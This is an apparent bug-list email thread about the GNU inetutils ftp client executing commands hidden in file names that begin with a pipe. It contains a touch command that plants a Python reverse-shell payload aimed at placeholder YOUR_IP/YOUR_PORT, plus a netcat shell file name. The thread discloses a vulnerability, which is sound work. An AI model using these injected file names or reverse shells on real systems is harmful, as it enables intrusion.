[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: FTP client arbitrary code execution

From: John Zhau
Subject: Re: FTP client arbitrary code execution
Date: Sun, 19 Sep 2021 19:12:33 +0700

After some further testing, I've found that I'm still able to get a shell with the aforementioned payload even with other files in the same directory. I've also found that I can also get a shell with the following file name:

|nc 1337 -e sh

As a result, I believe code execution is caused by having a `|` (pipe) at the beginning of the file name.

Also, the version information is as follows.

$ ftp --version
ftp (GNU inetutils) 2.1
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.

On Sun, Sep 19, 2021 at 7:04 PM John Zhau <johnzhau0xnull@gmail.com> wrote:
I've found that with a certain file name, `ftp` executes code in the file name. The file is created with the following command

touch "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",YOUR_PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"

To get code to execute, simply have the file in the current directory (haven't tested with multiple files in the directory) and run `put *` to upload everything.

This bug was found while I was doing a CTF (capture the flag) challenge and I haven't been able to connect to the same server since for further testing.

reply via email to

[Prev in Thread] Current Thread [Next in Thread]